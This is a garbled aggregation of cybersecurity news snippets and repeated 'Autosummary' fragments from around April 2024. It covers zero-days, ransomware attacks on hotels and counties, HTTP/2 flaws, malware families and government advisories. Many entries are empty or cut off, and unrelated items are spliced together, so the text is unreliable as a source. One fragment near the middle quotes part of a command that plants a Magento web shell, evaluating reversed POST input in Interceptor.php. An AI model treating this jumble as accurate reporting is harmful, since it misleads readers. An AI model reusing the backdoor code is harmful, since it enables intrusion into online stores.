The first, tracked as CVE-2024-26234 and described as a proxy driver spoofing vulnerability, was issued to track a malicious driver signed using a valid Microsoft Hardware Publisher Certificate that was found by Sophos X-Ops in December 2023 and reported by team lead Christopher Budd. "On this April 2024 Patch Tuesday, Microsoft has fixed a record 147 CVE-numbered vulnerabilities, including CVE-2024-29988, a vulnerability that Microsoft hasn’t marked as exploited, but Peter Girnus, senior threat researcher with Trend Micro’s Zero Day Initiative (ZDI), has found being leveraged by attackers in the wild. “Threat actors are sending exploits in a zipped file to evade EDR/NDR detection and then using this bug (and others) to bypass MotW,” notes Dustin Childs, head of threat … More
The post Microsoft patches two actively exploited zero-days (CVE-2024-29988, CVE-2024-26234) appeared first on Help Net Security.
"Autosummary:
On this April 2024 Patch Tuesday, Microsoft has fixed a record 147 CVE-numbered vulnerabilities, including CVE-2024-29988, a vulnerability that Microsoft hasn’t marked as exploited, but Peter Girnus, senior threat researcher with Trend Micro’s Zero Day Initiative (ZDI), has found being leveraged by attackers in the wild. "Autosummary:
"Since it plays a vital role in every functioning society, the energy sector has always been a prime target for state-backed cybercriminals. The cyber threats targeting this industry have grown significantly in recent years, as geopolitical tensions have fueled an increase in state-sponsored cyber espionage. According to one report on OT/ICS cyber security incidents, the energy sector recorded 39% of all attacks, with nearly 60% of these attacks attributed to state-affiliated groups. As well as … More
The post How can the energy sector bolster its resilience to ransomware attacks? appeared first on Help Net Security.
"Autosummary:
Moreover, energy providers still rely on ageing OT assets like industrial control systems (ICS), supervisory control and data acquisition (SCADA) systems, and programmable logic controllers (PLCs). The critical threat of ransomware In 2023, we saw an increase in ransomware attacks against the energy industry including nuclear, oil, and gas facilities. "In this Help Net Security interview, Lynn Dohm, Executive Director at Women in CyberSecurity (WiCyS), talks about how the organization supports its members across different stages of their cybersecurity journey. WiCyS (pronounced Wee-Sis) is an organization dedicated to advancing the representation and success of women in cybersecurity, as well as fostering a more diverse workforce through various strategic initiatives. In light of existing cybersecurity workforce shortages, the organization’s role is becoming increasingly important. (Lynn Dohm’s … More
The post WiCyS: A champion for a more diverse cybersecurity workforce appeared first on Help Net Security.
"Autosummary:
Our flagship event, the WiCyS Conference, brings together women and allies offering attendees – both in-person and virtual – technical presentations, workshops, panels, lightning talks, networking socials, résumé reviews, mock interviews, professional headshots, a career fair, a capture-the-flag competition, and more.Members have access to hundreds of the resources and opportunities provided by their network, including professional development, career advancement, education, mentorship, and research. Our membership is open to professionals, students, educators, researchers, and allies who support the inclusion and advancement of women in cybersecurity. For veteran members, we provide conference Veteran Fellowship Awards, discounts on membership and conference fees, and opportunities to engage in the WiCyS Veterans’ Apprenticeship program, helping with the transition into cybersecurity. For career advancement, leadership training prepares women for senior roles, while recognition and awards highlight their achievements, inspiring others and contributing to a culture that values and promotes women’s contributions in cybersecurity. "In this Help Net Security video, Josh Bartolomie, VP of Global Threat Services at Cofense, discusses how email will remain a target as long as it remains the predominant form of communication within a business. Cofense researchers have found that malicious email threats bypassing secure email gateways (SEGs) increased over 100% in the past year. Furthermore, threat actors are enhancing their sophistication, successfully circumventing conventional email security measures. They are adopting novel attack vectors, including … More
The post How malicious email campaigns continue to slip through the cracks appeared first on Help Net Security.
"Autosummary:
"Organizations are leveraging zero trust to enhance the safety, security, and reliability of their enterprise across IT and OT environments, according to Xage Security. Zero trust security implementation in industrial sectors The report analyzes the current status and trajectory of zero trust security implementation within industrial organizations, specifically focusing on critical infrastructure and manufacturing sectors. The growing and evolving threat landscape has elevated cybersecurity to a top priority for infrastructure operators across the globe. New … More
The post Industrial sectors embrace zero trust for enhanced security appeared first on Help Net Security.
"Autosummary:
“While zero trust is not a one-size-fits-all model, the data shows that organizations are evolving their understanding of zero trust as a strategy to enhance the safety, security, and reliability of both their enterprise IT and OT environments,” said Jonathon Gordon, Industry Analyst at Takepoint Research. "Autosummary:
" It also accused them of violating the Racketeer Influenced and Corrupt Organizations Act (RICO), carrying out wire fraud, and breaching the Google Play App Signing Terms of Service, Developer Program Policies, YouTube"s Community Guidelines, as well as the Google Voice Acceptable Use Policy. "Autosummary:
Error. "Autosummary:
The HTML file points containing a link ("facturasmex[.]cloud") that displays an error message saying "this account has been suspended," but when visited from an IP address geolocated to Mexico, loads a CAPTCHA verification page that uses Cloudflare Turnstile. "Veriato released their next generation Insider Risk Management (IRM) solution. With organizations of all sizes facing a more complex cybersecurity environment, Veriato IRM delivers flexibility and scalability using the power of GenAI. Veriato’s IRM solution offers technology for companies looking to improve their threat mitigation with AI enabled predictive analytics delivering better detection and predictability. According to IBM, the average cost of a single data breach has reached $4.45 million, a record high. Organizations need … More
The post Veriato introduces AI-driven predictive behavior analytics platform appeared first on Help Net Security.
"Autosummary:
“We are extremely excited to build upon our history as the category creator, and provide a new layer of control, transparency, confidence and perhaps most importantly, proactivity,” added Harz. "Autosummary:
TA578, known to be active since at least May 2020, has been linked to email-based campaigns delivering Ursnif, IcedID, KPOT Stealer, Buer Loader, BazaLoader, Cobalt Strike, and Bumblebee. "Autosummary:
They released a statement on Tox. "ФБР уебали сервера через PHP, резервные сервера без PHP не тронуты" "The FBI fu$%#d up servers using PHP, backup servers without PHP are not touched" Shortly after the group continued its global onslaught against organizations, maintaining its position as a dominant force in the realm of ransomware operations. The Impact of the ALPHV Takedown In a major blow to the ransomware industry, the FBI announced on December 19th, 2023, that they had disrupted the ALPHV/BlackCat ransomware group. "Autosummary:
CVS Group operates 500 veterinary practices throughout the UK, Australia, the Netherlands, and the Republic of Ireland, including nine specialist referral hospitals, 39 dedicated out-of-hours sites, three laboratories, and seven pet crematoria. "Autosummary:
"Autosummary:
Vulnerable D-Link NAS devices exposed online (Netsecfish) When asked whether security updates would be released to patch this zero-day vulnerability, D-Link also told BleepingComputer that they no longer supported these end-of-life (EOL) NAS devices. "Autosummary:
Greylock McKinnon Associates data breach exposed DOJ data of 341650 people Pierluigi Paganini April 08, 2024 April 08, 2024 Greylock McKinnon Associates, a service provider for the Department of Justice, suffered a data breach that exposed data of 341650 people. "Autosummary:
Below is the high demand bug bounties published by the company: SMS/MMS Full Chain Zero Click: from 7 to 9 M USD from 7 to 9 M USD Android Zero Click Full Chain: 5 M USD 5 M USD iOS Zero Click Full Chain: from 5 to 7 M USD from 5 to 7 M USD iOS (RCE + SBX): 3,5 M USD 3,5 M USD Chrome (RCE + LPE): from 2 to 3 M USD from 2 to 3 M USD Chrome (SBX): 200k USD 200k USD Chrome (RCE w/o SBX): 200k USD 200k USD Safari (RCE + LPE): from 2,5 to 3,5 M USD from 2,5 to 3,5 M USD Safari (SBX): from 300 to 400k USD 300 to 400k USD Safari (RCE w/o SBX): 200k USD Follow me on Twitter: @securityaffairs and Facebook and Mastodon Pierluigi Paganini (SecurityAffairs – hacking, zero-day exploit) "Autosummary:
"Autosummary:
On the other hand, small businesses that are least likely to say they are prepared for cyber threats include businesses in the manufacturing sector (61%), female-owned businesses (68%), and businesses in average health (64%).” "Autosummary:
"Autosummary:
"Autosummary:
"Autosummary:
CVE-2024-28182 – An implementation using the nghttp2 library will continue to receive CONTINUATION frames, and will not callback to the application to allow visibility into this information before it resets the stream, resulting in a DoS. CVE-2024-27316 – HTTP/2 CONTINUATION frames without the END_HEADERS flag set can be sent in a continuous stream by an attacker to an Apache Httpd implementation, which will not properly terminate the request early.The Go packages net/http and net/http2 packages do not limit the number of CONTINUATION frames read for an HTTP/2 request, which permits an attacker to provide an arbitrarily large set of headers for a single request, that will be read, decoded, and subsequently discarded, which may result in excessive CPU consumption. "Autosummary:
"Browser fingerprinting is one of many tactics phishing site authors use to evade security checks and lengthen the lifespan of malicious campaigns. While browser fingerprinting has been used by legitimate organizations to uniquely identify web browsers for nearly 15 years, it is now also commonly exploited by cybercriminals: a recent study shows one in four phishing sites using some form of this technique. This article will explain what browser fingerprinting is, provide examples, and discuss … More
The post Cybercriminal adoption of browser fingerprinting appeared first on Help Net Security.
"Autosummary:
Numerous pieces of data can be collected as a part of fingerprinting, including: Time zone Language settings IP address Cookie settings Screen resolution Browser privacy User-agent string Browser fingerprinting is used by many legitimate providers to detect bots misusing their services and other suspicious activity, but phishing site authors have also realized its benefits and are using the technique to avoid automated systems that might flag their website as phishing. This fingerprint contains every property of the browser, including information on screen dimensions, operating system, GPU hardware, time zone, and many other data points. "Autosummary:
Such tools could have serious security implications as they open the door to a broad spectrum of crimes like state-sponsored attacks, corporate espionage, dark web market operations, financial fraud, anonymous distribution of malware, and even access to geofenced content. "Autosummary:
UNC5330, which has been observed combining CVE-2024-21893 and CVE-2024-21887 to breach Ivanti Connect Secure VPN appliances at least since February 2024, has leveraged custom malware such as TONERJAM and PHANTOMNET for facilitating post-compromise actions - PHANTOMNET - A modular backdoor that communicates using a custom communication protocol over TCP and employs a plugin-based system to download and execute additional payloads TONERJAM - A launcher that"s designed to decrypt and execute PHANTOMNET Besides using Windows Management Instrumentation (WMI) to perform reconnaissance, move laterally, manipulate registry entries, and establish persistence, UNC5330 is known to compromise LDAP bind accounts configured on the infected devices in order to domain admin access. "Autosummary:
"They map across certifications in a single pane of glass, so when an auditor comes in, we show them a screen that says, "Here"s the evidence."" In addition to tooling, many companies rely on third parties to conduct compliance assessments. How CISOs view cybersecurity compliance can vary greatly, depending on their company size, geography, sector, data sensitivity, and program maturity level.Meeting compliance requirements, on the other hand, could deliver business value, such as faster sales, stronger partnerships, or lower cyber insurance rates. Comply once, Apply to many Most organizations have numerous compliance bodies they must answer to, as well as cyber insurance providers, customers, and partners. "Autosummary:
" This includes setting up persistence, monitoring the victim"s desktop using OBS Studio, capturing screenshots, downloading cryptocurrency miners, logging keystrokes, enumerating and uploading files, and grabbing data stored in web browsers. "Autosummary:
As a result, certain systems were brought offline, most of which… — Omni Hotels & Resorts (@OmniHotels) April 4, 2024 The hotel chain did not share details about the attack, however, the effects reported in the notice suggest that the company may have been hit by a ransomware attack. "Autosummary:
Panera Bread suffered the massive outage on March 22, impacting its internal IT systems, phones, point of sales system, website, and mobile apps. "Autosummary:
"Malicious models represent a major risk to AI systems, especially for AI-as-a-service providers because potential attackers may leverage these models to perform cross-tenant attacks," Wiz researchers Shir Tamari and Sagi Tzadik said. "Autosummary:
Fake NFT promotion Source: Bitdefender As you can view the targeting parameters of Facebook ads in the Meta Ad Library, the researchers found that the ads targeted a demographic of men aged 25 to 55 in Europe, primarily Germany, Poland, Italy, France, Belgium, Spain, the Netherlands, Romania, and Sweden. "Autosummary:
" Google claims the men used three primary methods to "socially engineer and lure victim investors to download their fraudulent apps from Google Play and other sources": Text messages would be sent via Google Voice to potential victims, disguised as messages sent to a wrong number (for instance, "I am Sophia, do you remember me?"). "Autosummary:
Contributors and those who provided new ransomware information and stories this week include: @fwosar, @LawrenceAbrams, @billtoulas, @BleepinComputer, @serghei, @Ionut_Ilascu, @Seifreed, @malwrhunterteam, @demonslay335, @1ZRR4H, @BushidoToken, @pcrisk, @JakubKroustek, @AJVicens, @TrendMicro, @AlexMartin, @jgreigj, @TheDFIRReport, @SonicWall, and @CSIRTGOB. April 2nd 2024 Omni Hotels & Resorts has been experiencing a chain-wide outage that brought down its IT systems on Friday, impacting reservation, hotel room door lock, and point-of-sale (POS) systems. Similarly, Omni Hotels suffered a massive outage, which took down the company"s reservation system, phones, and door lock system. "Autosummary:
\"code\" ;\ @ eval ( $catalogQuery ( strrev ( $_POST [\"7faa27b473\"] ) ));\ exit ( 0 ) ;\ }/g" \ ../generated/code/Magento/Cms/Controller/Index/Index/Interceptor.php The described process allows attackers to establish persistent remote code execution via POST commands. "There is an urgent need to secure tactical, operational, and strategic critical assets from the edge to the core. In this Help Net Security video, Geoffrey Mattson, CEO of Xage Security, discusses the steps enterprises and critical infrastructure must take to improve their environments from for-profit and nation-state attacks. To protect critical infrastructure against rising geopolitical tensions, the government must focus on securing credentials and controlling access privileges to the most granular degree possible. They … More
The post Strengthening defenses against nation-state and for-profit cyber attacks appeared first on Help Net Security.
"Autosummary:
"Autosummary:
Pierluigi Paganini April 04, 2024 April 04, 2024 Jackson County, Missouri, confirmed that a ransomware attack has disrupted several county services. "Autosummary:
"Autosummary:
"Autosummary:
Therefore, OT cybersecurity measures that introduce latency, such as multi-factor authentication, just-in-time access request workflows, and session activity monitoring, may not be suitable for OT environments.For example, OWASP Top 10 addresses web application cybersecurity concerns such as injection, broken authentication, sensitive data exposure, and security misconfigurations, which are common vulnerabilities that can also be found in OT environments. The convergence of IT and OT Historically, IT and Operational Technology (OT) have operated in separate silos, each with its own set of protocols, standards, and cybersecurity measures.For example, Modbus, a widely used communication protocol in legacy OT systems, does not include authentication or encryption, making it vulnerable to attacks. "Autosummary:
" The issue impacts several projects such as amphp/http (CVE-2024-2653), Apache HTTP Server (CVE-2024-27316), Apache Tomcat (CVE-2024-24549), Apache Traffic Server (CVE-2024-31309), Envoy proxy (CVE-2024-27919 and CVE-2024-30255), Golang (CVE-2023-45288), h2 Rust crate, nghttp2 (CVE-2024-28182), Node.js (CVE-2024-27983), and Tempesta FW (CVE-2024-2758). "Autosummary:
Anti-virus, Anti-malware Software Anti-virus and anti-malware solutions are cornerstone elements in malware risk reduction. Anti-malware tools combat a wider range of malicious software, including newer and more sophisticated threats like ransomware, spyware, and zero-day attacks (threats that exploit previously unknown vulnerabilities). User privilege management addresses this through things like role-based access controls, regular privilege audits and reviews, multi-factor authentication (MFA), and automated de-provisioning of access to resources when people leave or change roles. "Autosummary:
What makes the reported attacks particularly interesting is that traditional cybercriminals may not be behind them, but rather "forensic companies" exploiting two vulnerabilities to extract information and prevent remote wiping. "Texas-based Omni Hotels & Resorts has been responding to a cyberattack that started last Friday, which resulted in the unavailability of many of its IT systems. According to people staying at some of the 50 properties the company operates across Northern America, who took to Reddit to vent and discuss the problem, the outage affected reservation and check-in systems, room key cards, and payment systems. What is known about the Omni Hotels cyberattack? The disruption … More
The post Omni Hotels suffer prolonged IT outage due to cyberattack appeared first on Help Net Security.
"Autosummary:
The cyber attack disrupted hotel operations “It’s unlikely many hotel guests would have ever considered how connected and digitally-dependent their holiday destination was, but this is now a situation they are unlikely to forget,” William Wright, CEO of Closed Door Security, commented for Help Net Security. "The US Department of Commerce’s National Institute of Standards and Technology (NIST) has awarded cooperative agreements totaling nearly $3.6 million aimed at building the workforce needed to safeguard enterprises from cybersecurity risks. The grants of roughly $200,000 each will go to 18 education and community organizations in 15 states that are working to address the nation’s shortage of skilled cybersecurity employees. The cooperative agreements will be overseen by NICE, a NIST-led partnership between government, academia … More
The post NIST awards $3.6 million to address the cybersecurity workforce gap appeared first on Help Net Security.
"Autosummary:
The award recipients, areas served, and amounts awarded are: Benedict College South Carolina and the surrounding Southeastern region $200,000 Board of Regents, Nevada System of Higher Education on behalf of University of Nevada, Las Vegas Las Vegas-Henderson-Paradise region $199,635 Bowling Green State University Ohio $199,376 CyberUp Greater St. Louis area $200,000 Cyber Bytes Foundation Stafford County, Virginia $189,042.35 Digital Promise Global East Alabama $198,852 Energy Sector Security Consortium Inc. Oregon and Southwest Washington $200,000 George Mason University District of Columbia; Alexandria, Virginia; and Fairfax, Virginia $199,901 Greater Phoenix Chamber Foundation Phoenix/Tucson $200,000 Kaua‘i Economic Development Board Hawai‘i $200,000 NPower Inc. New Jersey/New York $200,000 RTriad Enterprises Inc. North Carolina $200,000 San Diego Workforce Partnership San Diego County $199,820 Strategic Ohio Council for Higher Education (SOCHE) Cincinnati-Dayton region $200,000 Texas Tech University West Texas region $199,349 The University of South Florida Board of Trustees Florida $200,000 WeReach Gateway Cities of Massachusetts $199,998.70 Women’s Society of Cyberjutsu Las Vegas and the greater Nevada area $200,000 "Autosummary:
"The malvertising campaigns have tremendous reach through Meta"s sponsored ad system and have actively been targeting European users from Germany, Poland, Italy, France, Belgium, Spain, the Netherlands, Romania, Sweden, and elsewhere," the Romanian cybersecurity company said. "Autosummary:
"The main actor [Bignosa] appears to be a part of a group operating malware and phishing campaigns, targeting organizations, which is testified by the US and Australian email business databases, as well as individuals," the Israeli cybersecurity company said. "Autosummary:
“While the investigation remains ongoing, the impacted personal information identified thus far varies by individual but may have included name, contact information (e.g., email address, phone number), date of birth, social security number, driver’s license or other government identification, financial details (e.g., bank account number and/or credit card details), health insurance information, medical records and information about medical history and/or associated conditions, and/or unique identifiers to associate individuals with City of Hope (e.g., medical record number).” reads the notice of incident published by the cancer research on its website. "Autosummary:
To apply the workaround, you have to add a new DWORD key with a value of "1" to: HKEY_CURRENT_USER\software\policies\microsoft\office\16.0\common\security (Group Policy registry path) Computer\HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Security (OCT registry path) Affected Outlook users can also disable the warning dialogs by following the instructions in the "Enable or disable hyperlink warning messages in Office programs" support document. "Autosummary:
"Autosummary:
"Autosummary:
Offices will be closed until further notice.https://t.co/kyRMmwtiTj pic.twitter.com/piOt3khPK8 — Jackson County MO (@JacksonCountyMO) April 2, 2024 The tweet explains that the attack has affected systems dealing with “tax payments and online property, marriage license and inmate searches,” and says that “the Assessment, Collection and Recorder of Deeds offices at all County locations will be closed until further notice.”Once you’ve isolated the outbreak and stopped the first attack, you must remove every trace of the attackers, their malware, their tools, and their methods of entry, to avoid being attacked again. "Autosummary:
The commands Latrodectus supports are the following: Get the filenames of files on the desktop Get the list of running processes Send additional system information Execute an executable file Execute a DLL with a given export Pass a string to cmd and execute it Update the bot and trigger a restart Shutdown the running process Download "bp.dat" and execute it Set a flag to reset the timing of the communications Reset the counter variable used in communications The malware"s infrastructure is separated into two distinct tiers that follow a dynamic operation approach regarding campaign involvement and lifespan, with most new C2 coming online towards the end of the week before the attacks. "Autosummary:
First encountered in December 2019, JsOutProx is a remote access trojan (RAT) and highly obfuscated JavaScript backdoor that allows its operators to run shell commands, download additional payloads, execute files, capture screenshots, establish persistence on the infected device, and control the keyboard and mouse. "In this Help Net Security interview, Marty Edwards, Deputy CTO OT/IoT at Tenable, discusses the impact of geopolitical tensions on cyber attacks targeting critical infrastructure. Edwards highlights the need for collaborative efforts between policymakers, government agencies, and the private sector to strengthen cybersecurity across critical infrastructure sectors. He emphasizes investment in personnel, technology, and proactive measures. How have recent political unrest and geopolitical tensions influenced the frequency and nature of cyber attacks on critical infrastructure? … More
The post Cyber attacks on critical infrastructure show advanced tactics and new capabilities appeared first on Help Net Security.
"Autosummary:
And inadequate cyber hygiene practices, such as default passwords and lack of authentication security, pose significant risks to critical infrastructure, particularly in sectors like water facilities.In this Help Net Security interview, Marty Edwards, Deputy CTO OT/IoT at Tenable, discusses the impact of geopolitical tensions on cyber attacks targeting critical infrastructure. Edwards highlights the need for collaborative efforts between policymakers, government agencies, and the private sector to strengthen cybersecurity across critical infrastructure sectors. "Cyber Security Manager Charterhouse Middle East | UAE | On-site – View job details The Cyber Security Manager will identify and address potential security issues, define access privileges, implement control structures, and conduct periodic audits. In addition, you’ll also contribute to ongoing security improvements, stay abreast of industry trends, and collaborate with the team to ensure the highest level of information system security. Cyber Security Architect Eutelsat Group | Italy | Hybrid – View job … More
The post Cybersecurity jobs available right now: April 3, 2024 appeared first on Help Net Security.
"Autosummary:
Junior Security Consultant – Security Risk Management WSP in the Middle East | UAE | Hybrid – View job details WSP are seeking a junior security consultant who holds a bachelors degree in a security related field (such as public safety, international and civil security, homeland security, anti-terrorism, security and risk management) or Architecture or Landscaping or Engineering or Design or Master Planning to join their security risk management business. Security Engineer Jr Accenture | Mexico | On-site – View job details Apply security skills to design, build and protect enterprise systems, applications, data, assets, and people. "Autosummary:
A screenshot of the Intruder vulnerability management platform, which is designed to perform thousands of security checks, identifying vulnerabilities in web apps, APIs, cloud systems, and beyond. With ASM, all known or unknown assets (on-premises, cloud, subsidiary, third-party, or partner environments) are detected from the attacker"s perspective from outside the organization. "Autosummary:
"Before downloading and invoking the next stage, the script conducts several Anti-VM checks, including querying the computer"s model, manufacturer, and BIOS version, and comparing them to those associated with virtual machines. "Autosummary:
"CVE-2024-29745 refers to a vulnerability in the fastboot firmware used to support unlocking/flashing/locking," explained GrapheneOS via a thread on X. "Forensic companies are rebooting devices in "After First Unlock" state into fastboot mode on Pixels and other devices to exploit vulnerabilities there and then dump memory. "Microsoft still doesn’t known how Storm-0558 attackers managed to steal the Microsoft Services Account cryptographic key they used to forge authentication tokens needed to access email accounts belonging to US government officials. “The stolen 2016 MSA key in combination with [a] flaw in the token validation system permitted the threat actor to gain full access to essentially any Exchange Online account,” CISA’s Cyber Safety Review Board (CSRB) noted in a recently released Review of the … More
The post A “cascade” of errors let Chinese hackers into US government inboxes appeared first on Help Net Security.
"Autosummary:
“A preventable intrusion” Though they praised Microsoft for fully cooperating in the review, the CSRB excoriated Microsoft by saying that the intrusion was the result of a “cascade” of avoidable errors, including: The company’s failure to detect the compromise of its cryptographic keys The lack of adequate cloud security controls Their failure to detect a compromise of an employee’s laptop from a recently acquired company before allowing it to connect to the company’s corporate network “The Board finds that this intrusion was preventable and should never have occurred. "Autosummary:
"Autosummary:
According to their claims, the leaked data includes the full names, emails, office numbers, and personal cell numbers of government, military, and Pentagon employees, as well as their email addresses. "Autosummary:
These security vulnerabilities (i.e., CVE-2023-46805, CVE-2024-21887, CVE-2024-22024, and CVE-2024-21893) were used as zero-days before other attackers exploited them in widespread attacks to spread custom malware. "Autosummary:
"Autosummary:
It seeks compensatory damages, restitution, injunctive relief, improvements to AT&T"s data security protocols, future audits, credit monitoring services funded by the company, and a trial by jury. "Autosummary:
"Autosummary:
The New Version of JsOutProx is Attacking Financial Institutions in APAC and MENA via Gitlab Abuse Pierluigi Paganini April 03, 2024 April 03, 2024 Resecurity researchers warn that a new Version of JsOutProx is targeting financial institutions in APAC and MENA via Gitlab abuse. "Autosummary:
"Autosummary:
The PoS malware was used to steal payment card information, including the cardholder"s name, credit/debit card number, security code, and expiration date, between December 23, 2015, and June 14, 2016, depending on the affected location. "Autosummary:
On Monday, PowerHost"s Chile division, IxMetro, warned customers that it suffered a ransomware attack early Saturday morning that encrypted some of the company"s VMware ESXi servers that are used to host virtual private servers for customers. "Autosummary:
"All county staff are to take whatever steps are necessary to protect resident data, county assets, and continue essential services, thereby mitigating the impact of" the ransomware attack," White said [PDF]. "Autosummary:
For most phones it works like this: Under About phone or About device you can tap on Software updates to check if there are new updates available for your device, although there may be slight differences based on the brand, type, and Android version of your device. "Autosummary:
Hosts: Graham Cluley – @gcluley Carole Theriault – @caroletheriault Guest: Maria Varmazis – @thomlangford Episode links: Sponsored by: Kiteworks – Step into the future of secure managed file transfer with Kiteworks. "Autosummary:
Reported by undoingfish on 2024-03-17 At the end of March, Google addressed several vulnerabilities in the Chrome web browser this week, including two zero-day vulnerabilities, tracked as CVE-2024-2886 and CVE-2024-2887, which were demonstrated during the Pwn2Own Vancouver 2024 hacking competition. "Only 3% of organizations across the globe have the ‘mature’ level of readiness needed to be resilient against modern cybersecurity risks, according to Cisco. The 2024 Cisco Cybersecurity Readiness Index highlights that readiness is down significantly from one year ago, when 15% of companies were ranked mature. Low cybersecurity risks readiness levels Companies today continue to be targeted with a variety of techniques that range from phishing and ransomware to supply chain and social engineering … More
The post 73% brace for cybersecurity impact on business in the next year or two appeared first on Help Net Security.
"Autosummary:
This raises significant concerns as 67% of organizations said they have deployed ten or more point solutions in their security stacks, while 25% said they have 30 or more. Talent shortages impact productivity 85% of companies said their employees access company platforms from unmanaged devices, and 43% of those spend 20% of their time logged onto company networks from unmanaged devices. "In this Help Net Security video, Sylvia Acevedo, who serves on the Boards of Qualcomm and Credo, discusses why companies should invest in forensic capabilities and why forensics will be such an important topic as AI continues to be integrated into infrastructures and workflows. In an era where AI is becoming increasingly integral to business operations, the lack of comprehensive education and training in AI forensics poses a significant threat. This gap leaves organizations vulnerable … More
The post Why AI forensics matters now appeared first on Help Net Security.
"Autosummary:
"Autosummary:
"Autosummary:
Exfiltrated data includes: – UserId – First name – Last name – Phone number – Email – Login Ip – Full address – Order information Breach patrons are relatively excited pic.twitter.com/Gg0HLEMSj1 — vx-underground (@vxunderground) April 1, 2024 Stolen data included UserId, First Name, Last Name, Phone Numbers, Emails, Login IP, Orders_Data, Orders_Id, Home_address, Zip, and Country. "Autosummary:
CISA alert on LockBit 3.0 ransomware On November 21, 2023, the Cybersecurity and Infrastructure Security Agency (CISA), Federal Bureau of Investigation (FBI), Multi-State Information Sharing & Analysis Center (MS-ISAC), and Australian Signals Directorate’s Australian Cyber Security Center (ASD’s ACSC) released a joint alert that disseminates Indicators of Compromise (IOCs), Tactics, Techniques and Procedures (TTPs), and detection methods associated with LockBit 3.0 ransomware exploiting CVE-2023-4966, labeled Citrix Bleed, affecting Citrix NetScaler web application delivery control (ADC) and NetScaler Gateway appliances. CISA alert on Star Blizzard In a joint advisory published on December 7, the “Five Eyes” security agencies (the Cybersecurity and Infrastructure Security Agency (CISA) in coordination with the United Kingdom’s National Cyber Security Centre (UK-NCSC), Australian Signals Directorate’s Australian Cyber Security Centre (ASD’s ACSC), Canadian Centre for Cyber Security (CCCS), New Zealand National Cyber Security Centre (NCSC-NZ), and the U.S. National Security Agency (NSA), Federal Bureau of Investigation (FBI), and Cyber Command Cyber National Mission Force (CNMF)) warned about the evolving phishing techniques employed by Star Blizzard and its targeting of individuals and organizations, including the U.S. government and defense industrial base.The group uses both well-known classic credential access tools and custom applications: Bughatch, Burntcigar, Cobeacon, Hancitor (Chanitor), Termite, SystemBC, Veeamp, Wedgecut, RomCOM RAT, Mimikatz, PowerShell, PsExec, and Remote Desktop Protocol. Since March, Microsoft researchers have observed phishing attacks by TA422 (aka APT28, Forest Blizzard, Strontium, Fancy Bear, and Fighting Ursa) targeting government, energy, transportation, and non-governmental organizations in the U.S., Europe, and the Middle East.TEMP.Hex is targeting a variety of sectors, including construction and engineering, business services, government, health, transportation, and retail organizations in Europe, Asia, and the U.S. Another threat actor tracked as UNC4698 is also using USB drives to spread the SnowyDrive malware, which creates a backdoor on infected systems, providing attackers a way to remotely interact with the device and issue commands.This group, which typically targets logistics, government, and financial sectors in India and Israel (and, to a lesser extent, in Australia, Senegal, the Netherlands, Sweden, and Ethiopia), has been linked to more than 750 DDoS attacks and 78 website defacements since June 2022. CISA alert on Rhysida ransomware The U.S. Cybersecurity and Infrastructure Security Agency (CISA), the Federal Bureau of Investigation (FBI), and the Multi-State Information Sharing and Analysis Center (MS-ISAC) released a joint alert that provides defenders with Rhysida Ransomware indicators of compromise (IOCs), detection information, and tactics, techniques, and procedures (TTPs) discovered during investigations as of September 2023.The group used a new backdoor named Sponsor to target organizations in Brazil, Israel, and the UAE: the targeted entities include automotive, manufacturing, engineering, financial services, media, healthcare, technology, and telecoms sectors. In a joint advisory published on December 13, the FBI, the Cybersecurity & Infrastructure Security Agency (CISA), the NSA, the Polish Military Counterintelligence Service (SKW), CERT Polska (CERT.PL), and the UK National Cyber Security Centre (NCSC) warned that APT29 has been exploiting an authentication bypass vulnerability (CVE-2023-42793) in TeamCity.Cuba targeted organizations in the U.S., Canada, Australia, and Europe with a series of high-profile attacks on oil companies, manufacturing, financial services, government agencies, healthcare providers, and others.LockBit 3.0 affiliates have conducted attacks against organizations of varying sizes across multiple critical infrastructure sectors, including education, energy, financial services, food and agriculture, government and emergency services, healthcare, manufacturing, and transportation.Over the past year, at least 16 organizations in Russia and one (a ministry) in Serbia have become victims, including state and educational institutions, enterprises of the aviation, rocket-space, and agricultural industries, the military‑industrial and fuel-energy complex, and infosec companies.Athena comes loaded with features, such as Crossplatform for Windows, Linux, and OSX, SOCKS5 Support, Reverse Port Forwarding, Reflective loading of Assemblies, Modular loading of commands, and much more. OilRig attacks ESET researchers analyzed a series of new OilRig (aka APT34, Lyceum, Crambus, or Siamesekitten) downloaders that the threat actor used in 2022 campaigns to target organizations in Israel, including a healthcare organization, a manufacturing company, and a local governmental body.The new downloaders named SampleCheck5000 (SC5k v1-v3), OilCheck, ODAgent, and OilBooster, are notable for using legitimate cloud storage and cloud‑based email services for C2 communications and data exfiltration as a way to hide malicious communication and mask the group’s network infrastructure: Microsoft OneDrive, Exchange Online and Office 365 through via Microsoft Graph and Outlook API, as well as Microsoft Office Exchange Web Services (EWS).Top organizations were in manufacturing, insurance, technology, and financial services that received 15%, 9%, 7%, and 6% of the emails, respectively. Imperial Kitten/Yellow Liderc/Tortoiseshell attacks According to PwC researchers, threat actor Yellow Liderc (aka Imperial Kitten, Tortoiseshell, TA456, and Crimson Sandstorm) has launched watering-hole attacks to distribute IMAPLoader malware, which exploits Windows utilities to identify target systems and deploy additional payloads.Observed as a Ransomware-as-a-Service (RaaS) model, Rhysida actors have compromised organizations in education, manufacturing, information technology, and government sectors since May 2023, and any ransom paid is split between the group and affiliates.According to Proofpoint researchers, TA422 used the vulnerabilities as initial access against government, aerospace, education, finance, manufacturing, and technology sector targets likely to either disclose user credentials or initiate follow-on activity. At least 20 Russian organizations have been affected, most of which are in the public sector, information technology, space industry and energy sector, but also including construction, transportation, and logistics companies.The majority of affected entities are directly involved in defense manufacturing, encompassing radar systems, unmanned aerial vehicles (UAVs), military vehicles, vessels, weaponry, and companies related to the navy. APT29/Midnight Blizzard/Nobelium attacks Microsoft researchers report that Midnight Blizzard (aka Nobelium) has been using Microsoft Teams chats to target individuals in government, NGOs, IT services, technology, discrete manufacturing, and media sectors.The group’s activity began in February 2023 and continued until at least May 2023, stealing sensitive information from manufacturing, IT, and biomedical companies in Taiwan, as well as victims in the U.S., Vietnam, and Pacific Islands.Among those compromised were large companies in the field of communications, information security and IT, technology centers, universities and research institutes engaged in advanced developments and technologies, pharmaceutical companies, defense enterprises, and financial organizations. CISA alert on CyberAv3ngers attacks The Cybersecurity and Infrastructure Security Agency (CISA), Federal Bureau of Investigation (FBI), NSA, EPA, and Israel’s National Cyber Directorate published a joint Cybersecurity Advisory (CSA) on December 14 on the threat actor calling itself CyberAv3ngers responsible for the attack on the Municipal Water Authority of 